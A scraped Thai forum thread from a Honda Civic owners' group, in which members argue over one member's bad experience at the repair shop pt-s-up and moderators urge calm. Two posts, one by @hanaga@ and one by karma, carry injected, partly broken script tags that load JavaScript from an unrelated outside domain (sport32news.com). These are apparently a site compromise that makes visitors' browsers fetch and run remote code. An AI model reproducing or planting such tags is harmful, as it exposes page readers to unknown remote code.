หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
13112D


ชื่อเล่น: เบิร์ด

เข้าร่วม: 18 พฤศจิกา 2009
ตอบ: 148

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 170
ให้คำขอบคุณ: 33

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 16 กรกฎา 2010 12:18 - เสียความรู้สึกกับร้าน pt-s-up จริง
ใจเย็นๆ ครับ ผมเอง บ้านอยู่สมุทรสาคร แต่ไปทำกับพี่เค้า ไปไม่ถูกเหมือนกันครับ เปิด GPS ไปเหมือนกัน อย่างที่บอกพี่เค้าไม่ค่อยสนใจแต่ด้วยความอยากรู้จึงรอ แต่รับลองได้ว่า ผลงานพี่เค้าออกมาดีจริง อิๆ ถ้าจะทำคงไปร้านพี่เค้า ถึงไกลแต่งานทำแล้วจบ
ได้รับคำขอบคุณจาก: Rangsit 33  hacker  kittidech  jonatan  mai  soda_get  ValuEs  Winny  cisco  kaorjang  chengg  BOY_PeTiTe  kunshybeer08  sukhothai  honeybeex7  RG.KiD  K_series  carrimoroll 
YINDEE


ชื่อเล่น: ต๊อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1516

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3233
ให้คำขอบคุณ: 3684

ที่อยู่: บ้าน
ปี: 2001
สี: ม่วง วินเทจพลัม (RP-32P)
ศุกร์, 16 กรกฎา 2010 12:20 - เสียความรู้สึกกับร้าน pt-s-up จริง
เดี๋ยวมีเวลาจะมาตอบด้วย อีกนะ


พอกันแค่นี้ก่อนเหอะ ยิ่งต่อยิ่งยาวหว่ะ


หาที่นั่งคุยกันมั๊ย ........ ปรับความเข้าใจกันอ่ะ
ได้รับคำขอบคุณจาก: Rangsit 33  hacker  soda_get  kittidech  jonatan  mai  ValuEs  Winny  cisco  zan  kaorjang  chengg  BOY_PeTiTe  kunshybeer08  sukhothai  honeybeex7  RG.KiD  kim_possible  carrimoroll 
Rangsit 33


เข้าร่วม: 01 ตุลา 2008
ตอบ: 2276

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3688
ให้คำขอบคุณ: 1582

ที่อยู่: Rangsit
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 12:23 - เสียความรู้สึกกับร้าน pt-s-up จริง
.......... Toyota ก็ดีครับ....บ้าย บ้ายยๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆ โชคดี
ได้รับคำขอบคุณจาก: hacker  aeae..  POD943  NeaT ES.  kittidech  jonatan  mai  ValuEs  Winny  cisco  kaorjang  BOY_PeTiTe  kunshybeer08  sukhothai  honeybeex7  RG.KiD  musashi44  YINDEE  carrimoroll  aun99 
nocomment


ชื่อเล่น: ตั้น

เข้าร่วม: 03 ตุลา 2009
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1289
ให้คำขอบคุณ: 1073

ที่อยู่: Nobletara-ngamwongwan Nonthaburi
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 16 กรกฎา 2010 12:23 - เสียความรู้สึกกับร้าน pt-s-up จริง
ความคิดแตกต่าง แต่ไม่แตกแยกนะครับ

ปรองดองๆ
ได้รับคำขอบคุณจาก: Rangsit 33  hacker  kittidech  jonatan  mai  kaisuh  ValuEs  Winny  cisco  kaorjang  BOY_PeTiTe  kunshybeer08  sukhothai  RG.KiD  kim_possible  carrimoroll  Justinaen 
zan


เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

ที่อยู่: HNC
ศุกร์, 16 กรกฎา 2010 12:29 - เสียความรู้สึกกับร้าน pt-s-up จริง
เฮ่ออออออ.อ.อ.อ.อ.อ.

อ่านแล้วเศร้าหว่ะ



ผมว่า admin ลบกระทู้นี้ไปเถอะครับ
ขออภัย จขกท. ด้วยนะครับ ผมว่าอย่างนี้มันจะทำให้มีแต่ผลเสียนะครับ
พอสมควรแล้ว . . . เลิก ment กันได้แล้วครับ


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 12:31, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Rangsit 33  hacker  fff_1232  kittidech  jonatan  mai  kaisuh  ValuEs  Winny  cisco  kaorjang  BOY_PeTiTe  kunshybeer08  sukhothai  honeybeex7  RG.KiD  kim_possible  carrimoroll  ziloz 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 12:29 - เสียความรู้สึกกับร้าน pt-s-up จริง
แค่นี้ยังหลงประเด็น ที่ทุกคนตอบ เพื่อจะชี้แจง ว่าไม่ใช่เค้าไม่ง้อลูกค้า แต่งานมันเยอะ


วู้วววว

ประชดสังคมแบบนี้ ....ไม่ไหวๆ โตโยต้าก็ดีครับ บ้าย บาย
ได้รับคำขอบคุณจาก: Rangsit 33  POD943  soda_get  kittidech  zan  jonatan  mai  ValuEs  Winny  cisco  kaorjang  BOY_PeTiTe  kunshybeer08  sukhothai  honeybeex7  RG.KiD  musashi44  numixer  carrimoroll 
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
ศุกร์, 16 กรกฎา 2010 12:31 - เสียความรู้สึกกับร้าน pt-s-up จริง
ใจเย็น บางครั้งมันคงจะให้ดีเหมือนกันหมดทุกคน 100% เป็นไปไม่ได้เนาะ....มันก็อาจมีข้อผิดพลาดกันบ้าง อาจพอดีมาเกิดที่คุณก็ได้นะครับ... ผมว่าโดยส่วนใหญ่น่าจะพอเข้าใจคุณเหมือนกัน..แต่ผมติงนิดนึงนะครับ...ผมว่าคุณระบายแรงไปหน่อย..ผลมันเลยสะท้อนเป็นแบบนี้ครับ..."ทัศนะ นะครับ"
ได้รับคำขอบคุณจาก: Rangsit 33  hacker  soda_get  kittidech  zan  jonatan  mai  kaisuh  ValuEs  Winny  cisco  kaorjang  BOY_PeTiTe  sukhothai  honeybeex7  RG.KiD  musashi44  kim_possible  carrimoroll 
POD943


ชื่อเล่น: ป็อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 269

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 439
ให้คำขอบคุณ: 1235

ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 16 กรกฎา 2010 12:38 - เสียความรู้สึกกับร้าน pt-s-up จริง
แนะนำครับ บริการดีมีประกันอะไหล่ 6 เดือนด้วย เข้าศูนย์ HONDA ใกล้บ้างดีไหมครับ
ได้รับคำขอบคุณจาก: Rangsit 33  hacker  kittidech  jonatan  mai  Winny  cisco  kaorjang  BOY_PeTiTe  sukhothai  honeybeex7  RG.KiD  carrimoroll 
@hanaga@


เข้าร่วม: 01 ตุลา 2008
ตอบ: 360

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 493
ให้คำขอบคุณ: 132

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 กรกฎา 2010 13:15 - เสียความรู้สึกกับร้าน pt-s-up จริง
debuglogin พิมพ์ว่า:
จริงๆ ไม่เห็นต้องนั่งแก้ตัวแทนกันเลยนะครับ พวกคุณก็มีข้อมูล มีประสบการณ์ตามที่พวกคุณเจอกันมา ประสบการณ์ผมเจอมาแบบนี้ ผมเองเข้าเว็บนี้ทุกวันตั้งแต่ผมซื้อรถคันนี้มา โดยหวังว่าเป็นพี่เป็นน้องกัน หลายๆ ท่านที่ตอบกระทู้นี้ต่อว่าผมไว้เยอะ ผมจะไม่ตอบโต้อะไรพวกพี่นะครับ เพราะหลายๆ ท่านที่ว่า เวลารถผมมีปัญหาผมจำ display img พวกพี่ได้อะนะ พวกพี่ช่วยเหลือผมเป็นอย่างดี เอาเป็นว่านี่เป็นอะไรที่ผมเจอมา ตั้งแต่ครั้งแรก ถ้าผมไม่นึกถึงคำพูดพวกพี่ในบอร์ด ผมคงเปลี่ยนร้านไปแล้ว วันนั้นผมไปกับแฟน ระหว่างเดินทาง ผมบอกว่าร้านที่กำลังจะไปเป็นร้านที่เทพที่สุด โม้ไว้เยอะว่างั้น พอไปถึงร้านผมถึงกับหน้าเสียเหมือนกัน พูดยากครับเรื่องนี้ เอาเป็นว่าใครทำอะไรไว้กับใคร ก็น่าจะรู้ตัวนะครับ ส่วนตัวผมนอกจากงานประจำ ตอนนี้ทำธุรกิจทางไอทีอยู่ด้วย เพิ่งเริ่มต้นทำครับ ก็พอรู้บ้างว่ากลุ่มงานบริการ เราต้องทำกับลูกค้ายังไง ถึงแม้ว่าเราจะเป็นแบรนด์ที่ติดตลาดแล้วก็ตาม ไม่เป็นไรครับ รู้ว่างานพี่เขาเยอะคงไม่ง้อลูกค้าเป็นธรรมดา โดยเฉพาะรายเล็กอย่างผม ผมก็ทำที่อื่นแค่นั้นเอง เพราะผมก็เจอแล้วด้วยว่าที่ไหน ผมอยากจะเอามาแนะนำ แบ่งปันพวกคุณเท่านั้นเอง สำหรับคนที่ใจเหมือนผม คือถ้าพูดไม่ดี ก็ไม่ทำแล้ว เรื่องอื่นเป็นเรื่องรอง ผมเองเชื่อว่าเงินที่เราหามา เราควรจะซื้อบริการเค้าพร้อม และเต็มใจจะให้บริการครับ บางครั้งเรื่องพวกนี้มันก็ชนะงานขั้นเทพอย่างว่านะครับ จริงๆ วันนั้นผมจะเอาบิลไปขอเงินพี่เขาคืนแหละครับ เพราะผมต้องตั้งวาล์วใหม่หมดเลย เพราะเขาวัดแล้วไอที่ใช้เหล็กเีสียบๆ เขาบอกว่าตั้งวาล์วยัน และเขาแก้แค่นั้นจริงๆ แล้วตอนนี้รถผมก็ปกติแล้ว อ่อเพิ่มเติมวันนั้นผมล้างเบรคด้วย ก็ดีมากครับ พอยกรถขึ้นพี่เขาก็บอกผมว่า ลูกยางปีกนก ประมาณนี้นะครับ ผมอาจจะจำผิด มันขาดนะครับ ผมเลยถามว่า แล้วอาการจะเป็นไงบ้างครับ เขาก็บอก ลงหลุมแล้ว กึ๊กๆๆๆ เลยแหละ อื่มมม ปัญหาที่ผมปวดหัวมานาน ก็ให้เขาแก้ เปลี่ยนยางสองข้าง ข้างละห้าร้อย จบครับ ขับรถออกมายิ้มมม เสียงหายหมด แค่ยางสองตัว ส่วนถ้าพวกคุณคิดว่าที่ไหนดีก็ทำครับ ก็เป็นเรื่องธรรมดา นี่ก็มุมผม



debuglogin พิมพ์ว่า:
สงสัยผมเข้าใจสังคมที่นี่ผิดจริงๆ ครับ ก็ลาเลยแล้วกันครับ พี่ๆ ทุกท่าน วันนี้อะไรๆ กระจ่างขึ้นเยอะ ผมพูดในฐานะที่ผมโดนมาแบบนี้ เอากลับมาเล่าให้ครอบครัวผมฟัง แต่คงบังเิอิญว่าผมเข้าใจอะไรผิดไป แบบนี้ระบบพรรคพวกแล้วมั้งครับ

ไม่เป็นไรครับหลายท่านที่ ... ผมวันนี้เป็นคนที่เคยมีน้ำใจมาตอบประเด็นที่ผมเคยตั้งถาม ตรงบ้างไม่ตรงบ้างแต่ก็รู้สึกดีเวลาเรามีปัญหาแล้วมีคนมาช่วยแก้ เพราะผมนี่เรื่องรถเรื่องใหญ่กว่าแฟนอีก


ยังไงเพื่อไม่ให้เกิดแนวความคิดที่แตกต่าง ก็ลบๆ กันไปเลยก็ได้ครับสำหรับกระทู้นี้ หรือถ้า admin จะกรุณาลบ account ผมเลยก็ได้ครับ เพราะคงไม่เข้ามาที่นี่อีก



(ใจหวิวเล็กๆ น้อย)
ขอบคุณครับสำหรับเกร็ดความรู้ทั้งหมดที่ได้มาจากที่เว็บนี้ & เป็นประโยชน์มากครับ เพราะแต่ก่อนผมใช้ toyota ตอนเปลี่ยนเป็นฮอนด้าผมนี่หาข้อมูลกระจาย จนมาเจอเว็บนี้ก็ยึดติดเลย แต่ในเมื่อมันเป็นแบบนี้ก็ลาแล้วกันครับผม



555 มาปั่นกระทู้เล่นๆ เผื่อ Admin อยากจะลบซะที

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

เท่าที่ฟังตอนแรก คนอื่นเขาก็ตอบทำนองประสบการณ์ที่เขาเจอนะครับ
เพียงแต่มีเหน็บในคำตอบของคุณบ้าง (คำว่าเหน็บเขาใจนะครับ) เอาเป็นว่าทุกคนต้องการแชร์ประสบการณ์และเหล่าเรื่องราวต่างๆ
แต่เรื่องเปลี่ยนยี่ห้อรถเนี้ย ผมเห็นด้วยอย่างยิ่งครับ เมื่อเราไม่พอใจอะไรก็รีบเปลี่ยนเลยครับ ให้ไวด้วย
(ถึงแม้จะไม่เกี่ยวกับตัวเว็บ หรือเกี่ยวกับคนที่มาตอบกระทู้ หรือคนที่ทำอู่รถฮอนด้าอื่นๆที่ไม่รู้อิโหน่อิเหน่ เอ๋พิมพ์ถูกเปล่าว้า เดียวโดนคนอื่นเหน็บบ้าง อิอิ)

ผมเชื่อว่าทุกคนที่ตอบกระทู้ ไม่ได้ไปร้านพี่เขาทุกคน แต่ก็รักรถทุกคนแหละครับ หวังว่าคันหน้าอย่าให้น้อยกว่า camry นะครับ

จริงๆผมมีภาพนึงประทับใจกับร้านเขาเป็นส่วนตัวนะครับ มีคู่สามีภรรยา (ภรรยาท้องโตมาเลย) บอกว่าอยากแก้ไขในรถนิ่มกระทบกระเทือนลูกน้อยที่สุด แล้วพี่แกก็นั่งรถไปเทส(Test) เลยนะครับ มันเลยเป็นภาพติดตานะครับว่าบริการของแก
ถ้าเรามาช่วงที่แกอยู่มันจะเป็นยังไง


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 16 กรกฎา 2010 13:21, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Rangsit 33  kittidech  jonatan  mai  ValuEs  Winny  cisco  kaorjang  BOY_PeTiTe  sukhothai  honeybeex7  RG.KiD  musashi44  hacker  carrimoroll 
หัวเสีย


ชื่อเล่น: โรจน์

เข้าร่วม: 08 ธันวา 2009
ตอบ: 41

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 84
ให้คำขอบคุณ: 58

ที่อยู่: นครปฐม
ปี: 2002
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
ศุกร์, 16 กรกฎา 2010 13:18 - เสียความรู้สึกกับร้าน pt-s-up จริง
อ่านไปอ่านมาชักมัน!!! .....ขอแจมด้วยคน
ผมไม่เคยเอารถเข้าไปทำ แต่เคยไปคุยกับพี่เค้าที่ร้าน จากการที่คุยพี่เค้าจะคุยกับเราเป็นกันเองไม่มีพิธีมาก คุยแบบเพื่อนสนิดเค้าคุยกันว่างันเถอะ(แค่ขาดคำว่ามึงกูแค่นั้นเอง).....
อาจจะไม่ค่อยถูกใจคนที่มีพิธีมากต้องยกมือไหว้ ครับ..ค่ะ..
เชิญไปกินกาแฟในห้องรับลองลูกค้าก่อนน่ะค่ะ อะไรปะมานเนี๊ยะ
คือ จขกท ต้องเข้าใจด้วยน่ะครับ คำว่า อู่หรือร้านทั้วไปจะเป็นปะมาณ แต่ถ้าจะเอาดีๆต้องศูนย์บริการน่ะครับ
ได้รับคำขอบคุณจาก: zan  Rangsit 33  jonatan  mai  aeae..  ValuEs  Winny  cisco  kaorjang  BOY_PeTiTe  sukhothai  honeybeex7  POD943  RG.KiD  musashi44  hacker  YINDEE  kim_possible  carrimoroll  nu_es_05 
naponghp


ชื่อเล่น: หนึ่ง

เข้าร่วม: 27 พฤษภาคม 2009
ตอบ: 782

Moderator
Moderator

ได้รับคำขอบคุณ: 1032
ให้คำขอบคุณ: 1318

ที่อยู่: Samutprakarn - Sukothai - Homepro Anywhere
ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 16 กรกฎา 2010 13:30 - เสียความรู้สึกกับร้าน pt-s-up จริง
เอาเป็นว่าผมมากลางๆๆๆ นะ

ผมเห็นว่ามันกลายเป็นความขัดแย้งที่เกิดขึ้นระหว่างสมาชิกแล้ว

พวกเรายังเป็นกลุ่มคนที่มีความชอบในสิ่งเดียวกันอยู่นะครับ ไม่อยากให้เกิดความแตกแยกกัน

ที่ละประเด็นละกัน

1. เรื่องการเอาใจใส่ลูกค้า ผมว่า ก็เป็นเหมือนกัน ไม่ว่าจะรู้จักกับพี่ใหม่มากน้อย ไม่มีเวลาคุยเหมือนกัน เนื่องจากงานเยอะ

2. เรื่องการรอคอยรถเสร็จ ทุกท่านน่าจะนานเหมือนกัน ผมเข้าไปประมาณ 3 ครั้งแล้ว เข้าไปประมาณ 11 โมงทุกครั้ง

รถเสร็จประมาณ 5 - 6 โมงทุกครั้ง ( เคยทำล้างปีก ตั้งวาล์ว และถ่ายนำมันเครื่อง ยังประมาณนี้เลย)

และ รถเสร็จมีปัจจัยหลายอย่างครับเพราะว่ารถที่เข้าไปทำแต่ละคันทีปัญหาและลักษณะการซ่อมไม่เหมือนกัน

3. ส่วนเรื่องจบไม่จบ ผมมองเป็นเรื่องของความรู้สึกส่วนตัวมากกว่าว่า K หรือ ไม่ K และถ้าไม่ K จริงผมว่าศูนย์จะไม่รับผิดชอบ

มากกว่าอู่อีก

ส่วนความเห็นส่วนตัวคุณระบายแรงไปไหม อาจจะเป็นเพราะความโกรธหรือเปล่า

ส่วนสมาชิกท่านอื่นๆๆๆ ใจเย็นนะครับ
ได้รับคำขอบคุณจาก: zan  soda_get  kittidech  jonatan  mai  หัวเสีย  ValuEs  kaisuh  Winny  cisco  kaorjang  BOY_PeTiTe  sukhothai  honeybeex7  RG.KiD  musashi44  hacker  YINDEE  kim_possible  carrimoroll 
~ สเตฟาน ~


ชื่อเล่น: สเตฟาน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

ที่อยู่: รังสิต ประดิพัทธิ์
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 16 กรกฎา 2010 13:32 - เสียความรู้สึกกับร้าน pt-s-up จริง
ใจร่มๆ ใจร่มๆ สมาชิกทุกท่าน

อย่าให้ความรู้สึกของกันและกันเสียไปมากกว่านี้เลย

เรื่องที่พอจะหันหน้าคุยกัน ปรึกษากัน ให้โอกาสกัน น่าจะเป็นทางออกที่ดี..สำหรับครอบครัวของเราเน้อ

ป.ล. 1 จขกท. ก็ใจเย็นๆเน้อ ถือว่าแชร์ประสบการณ์กัน
ป.ล. 2 โดยส่วนตัวผมเอง ก็ยังเชื่อมั่นในร้านพี่เขาตลอดไป
fff_1232


ชื่อเล่น: ต้น

เข้าร่วม: 01 ตุลา 2008
ตอบ: 708

Guru ES
Guru ES

ได้รับคำขอบคุณ: 612
ให้คำขอบคุณ: 1472

ที่อยู่: พระราม 2
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 16 กรกฎา 2010 13:37 - เสียความรู้สึกกับร้าน pt-s-up จริง
~ สเตฟาน ~ พิมพ์ว่า:
ใจร่มๆ ใจร่มๆ สมาชิกทุกท่าน

อย่าให้ความรู้สึกของกันและกันเสียไปมากกว่านี้เลย

เรื่องที่พอจะหันหน้าคุยกัน ปรึกษากัน ให้โอกาสกัน น่าจะเป็นทางออกที่ดี..สำหรับครอบครัวของเราเน้อ

ป.ล. 1 จขกท. ก็ใจเย็นๆเน้อ ถือว่าแชร์ประสบการณ์กัน
ป.ล. 2 โดยส่วนตัวผมเอง ก็ยังเชื่อมั่นในร้านพี่เขาตลอดไป


+1 ครับ
ได้รับคำขอบคุณจาก: kittidech  zan  mai  หัวเสีย  Winny  kaorjang  ValuEs  jonatan  BOY_PeTiTe  sukhothai  RG.KiD  musashi44  hacker  kim_possible  carrimoroll 
karma


ชื่อเล่น: เต๋า

เข้าร่วม: 23 มีนา 2009
ตอบ: 718

Guru ES
Guru ES

ได้รับคำขอบคุณ: 954
ให้คำขอบคุณ: 722

ที่อยู่: พระราม 2
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 16 กรกฎา 2010 13:57 - เสียความรู้สึกกับร้าน pt-s-up จริง
ต่างคนต่างประสบการณ์ครับ ใจเย็นๆครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: zan  Rangsit 33  mai  kittidech  หัวเสีย  Winny  kaorjang  ValuEs  jonatan  BOY_PeTiTe  sukhothai  honeybeex7  RG.KiD  musashi44  hacker  kim_possible  carrimoroll 
wut-chiangmai


ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

ที่อยู่: เชียงใหม่
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 16 กรกฎา 2010 14:07 - เสียความรู้สึกกับร้าน pt-s-up จริง
อ่านแล้วเศร้าจังเลยครับ

ยังไงก็ใจเย็น ๆ กันก่อนนะครับ

เผื่อถ้าเจ้าของกระทู้จะแวะเข้ามาอ่าน

คุณลองอ่านโพสแรกดู ว่าคุณใส่อารมณ์เข้าไปหรือเปล่า จุดเริ่มต้นมันอยู่ตรงนั้นแหละ
ทำไมท่านอื่น ๆ ถึงมีเหน็บแนม ก็เพราะคุณใช้อารมณ์มากกว่าเหตุผลก่อน

แค่นั้นจริง ๆ


ปล. ยังไม่เคยไปร้านพี่ใหม่ แต่อยากเก็บเงินเข้าไปเสียที่ร้านซักครั้ง

รัก ES Group ครับ
ได้รับคำขอบคุณจาก: kittidech  zan  mai  soda_get  หัวเสีย  Winny  kaorjang  ValuEs  jonatan  BOY_PeTiTe  sukhothai  honeybeex7  RG.KiD  musashi44  numixer  hacker  kim_possible  carrimoroll 
kidz


ชื่อเล่น: เอก

เข้าร่วม: 13 มิถุนา 2009
ตอบ: 296

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 398
ให้คำขอบคุณ: 71

ปี: 2001
สี: แดง แรลไล (R-513)
ศุกร์, 16 กรกฎา 2010 14:11 - เสียความรู้สึกกับร้าน pt-s-up จริง
ขอมั่ง ถือว่าแชร์ประสบการณ์กัน
เคยเข้าไปร้านพี่ใหม่ 2 ครั้ง ครั้งแรกเอา toyota เพื่อนไปทดลอง ก็แค่ไปอัดน้ำมันกับลองโช๊ค ไปซะสายๆ คนเพียบแต่ก็ยังรอกันจนเสร็จ feedback จากเพื่อนผมมาค่อนข้างดีเลย
ถึงคราวผมมั่ง เอารถเข้าไปเพื่อจะเปลี่ยนสปริงจากสปริงตัดเป็น TEIN ไปถึง 8 โมงนิดๆ ยังอุตส่าห์มีคนมาก่อนหน้าอีก อันนี้ยอมครับ Ok รอพักใหญ่ๆ พี่ใหม่ก็มาผมก็เดินไปคุยกับพี่แกถามนู่นถามนี่ว่าเปลี่ยนแล้วจะเป็นยังไง พี่แกบอกเดี๋ยวเอารถไปลองดูให้นั่งไปด้วยกัน ระหว่างทางแกก็อธิบายไปเรื่อยๆ แต่ก็ยังมีโทรศัพท์เข้ามาเรื่อยๆ ก็เข้าใจว่างานยุ่งแต่แกก็ยังออกมาลองรถกับลูกค้า ตอนแรกผมกะจะเปลี่ยนทั้งโช๊คไปเลยแต่พี่ใหม่บอกว่าอัดน้ำมันไปก็พอแล้ว สรุปวันนั้นเลยทำแค่อัดน้ำมัน เปลี่ยนสปริง และเลื่อนเบ้าหน้าแค่นั้น

โดยรวมสำหรับผม ผม happy นะครับถึงจะไม่ได้คุยอะไรมากแต่งานที่ออกมาถือว่าประทับใจได้เลย กลับมาที่ office ก็มาเล่าให้พี่ๆ ฟังเค้าก็บอกว่า ร้านนี้พี่ก็ไปทำบ่อยเหมือนกัน

จริงๆ ผมแค่อยากจะบอกว่าถ้าไปทำแล้วไม่พอใจก็ไม่ต้องไปทำอีก มีหลายร้านที่ผมเอารถเข้าไปแล้วไม่ประทับใจ ผมก็ไม่เข้าไปอีก แต่คนอื่นที่เค้าไปทำ เค้าอาจจะประทับใจก็ได้ ของแบบนี้มันขึ้นอยู่กับความพอใจของแต่ละคน อย่างในกรณีนี้คุณเข้าไปทำแล้วไม่ประทับใจ แต่อีกหลายๆคนที่เข้าไปเค้าก็ happy ดีครับ

ปล.ผมไปถึง 8 โมงเช้านิดๆ ได้รถตอนเกือบบ่าย 3 นะครับ
ได้รับคำขอบคุณจาก: iMan  zan  mai  soda_get  kittidech  หัวเสีย  kaisuh  Winny  cisco  kaorjang  ValuEs  jonatan  BOY_PeTiTe  sukhothai  honeybeex7  RG.KiD  musashi44  K_series  hacker  YINDEE  fff_1232  kim_possible  carrimoroll  Justinaen 
kittidech


ชื่อเล่น: กิต คร้าบ

เข้าร่วม: 06 กรกฎา 2009
ตอบ: 2334

Moderator
Moderator

ได้รับคำขอบคุณ: 2835
ให้คำขอบคุณ: 15110

ที่อยู่: อ.บ้านบึง จ.ชลบุรี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 กรกฎา 2010 14:19 - เสียความรู้สึกกับร้าน pt-s-up จริง
~ สเตฟาน ~ พิมพ์ว่า:
ใจร่มๆ ใจร่มๆ สมาชิกทุกท่าน

อย่าให้ความรู้สึกของกันและกันเสียไปมากกว่านี้เลย

เรื่องที่พอจะหันหน้าคุยกัน ปรึกษากัน ให้โอกาสกัน น่าจะเป็นทางออกที่ดี..สำหรับครอบครัวของเราเน้อ

ป.ล. 1 จขกท. ก็ใจเย็นๆเน้อ ถือว่าแชร์ประสบการณ์กัน
ป.ล. 2 โดยส่วนตัวผมเอง ก็ยังเชื่อมั่นในร้านพี่เขาตลอดไป


+1 ผมก็จะไปทำรถที่ร้านพี่ใหม่ต่อไป
ได้รับคำขอบคุณจาก: mai  หัวเสีย  Winny  kaorjang  ValuEs  jonatan  BOY_PeTiTe  sukhothai  RG.KiD  musashi44  hacker  fff_1232  kim_possible  carrimoroll 
chengg


เข้าร่วม: 17 ธันวา 2008
ตอบ: 609

Treasurer
Treasurer

ได้รับคำขอบคุณ: 3641
ให้คำขอบคุณ: 6263

ที่อยู่: เชียงใหม่~~* หนาว..และขาวมากกก
ศุกร์, 16 กรกฎา 2010 14:28 - เสียความรู้สึกกับร้าน pt-s-up จริง
debuglogin พิมพ์ว่า:
จริงๆ ไม่เห็นต้องนั่งแก้ตัวแทนกันเลยนะครับ พวกคุณก็มีข้อมูล มีประสบการณ์ตามที่พวกคุณเจอกันมา ประสบการณ์ผมเจอมาแบบนี้ ผมเองเข้าเว็บนี้ทุกวันตั้งแต่ผมซื้อรถคันนี้มา โดยหวังว่าเป็นพี่เป็นน้องกัน หลายๆ ท่านที่ตอบกระทู้นี้ต่อว่าผมไว้เยอะ ผมจะไม่ตอบโต้อะไรพวกพี่นะครับ เพราะหลายๆ ท่านที่ว่า เวลารถผมมีปัญหาผมจำ display img พวกพี่ได้อะนะ พวกพี่ช่วยเหลือผมเป็นอย่างดี เอาเป็นว่านี่เป็นอะไรที่ผมเจอมา ตั้งแต่ครั้งแรก ถ้าผมไม่นึกถึงคำพูดพวกพี่ในบอร์ด ผมคงเปลี่ยนร้านไปแล้ว วันนั้นผมไปกับแฟน ระหว่างเดินทาง ผมบอกว่าร้านที่กำลังจะไปเป็นร้านที่เทพที่สุด โม้ไว้เยอะว่างั้น พอไปถึงร้านผมถึงกับหน้าเสียเหมือนกัน พูดยากครับเรื่องนี้ เอาเป็นว่าใครทำอะไรไว้กับใคร ก็น่าจะรู้ตัวนะครับ ส่วนตัวผมนอกจากงานประจำ ตอนนี้ทำธุรกิจทางไอทีอยู่ด้วย เพิ่งเริ่มต้นทำครับ ก็พอรู้บ้างว่ากลุ่มงานบริการ เราต้องทำกับลูกค้ายังไง ถึงแม้ว่าเราจะเป็นแบรนด์ที่ติดตลาดแล้วก็ตาม ไม่เป็นไรครับ รู้ว่างานพี่เขาเยอะคงไม่ง้อลูกค้าเป็นธรรมดา โดยเฉพาะรายเล็กอย่างผม ผมก็ทำที่อื่นแค่นั้นเอง เพราะผมก็เจอแล้วด้วยว่าที่ไหน ผมอยากจะเอามาแนะนำ แบ่งปันพวกคุณเท่านั้นเอง สำหรับคนที่ใจเหมือนผม คือถ้าพูดไม่ดี ก็ไม่ทำแล้ว เรื่องอื่นเป็นเรื่องรอง ผมเองเชื่อว่าเงินที่เราหามา เราควรจะซื้อบริการเค้าพร้อม และเต็มใจจะให้บริการครับ บางครั้งเรื่องพวกนี้มันก็ชนะงานขั้นเทพอย่างว่านะครับ จริงๆ วันนั้นผมจะเอาบิลไปขอเงินพี่เขาคืนแหละครับ เพราะผมต้องตั้งวาล์วใหม่หมดเลย เพราะเขาวัดแล้วไอที่ใช้เหล็กเีสียบๆ เขาบอกว่าตั้งวาล์วยัน และเขาแก้แค่นั้นจริงๆ แล้วตอนนี้รถผมก็ปกติแล้ว 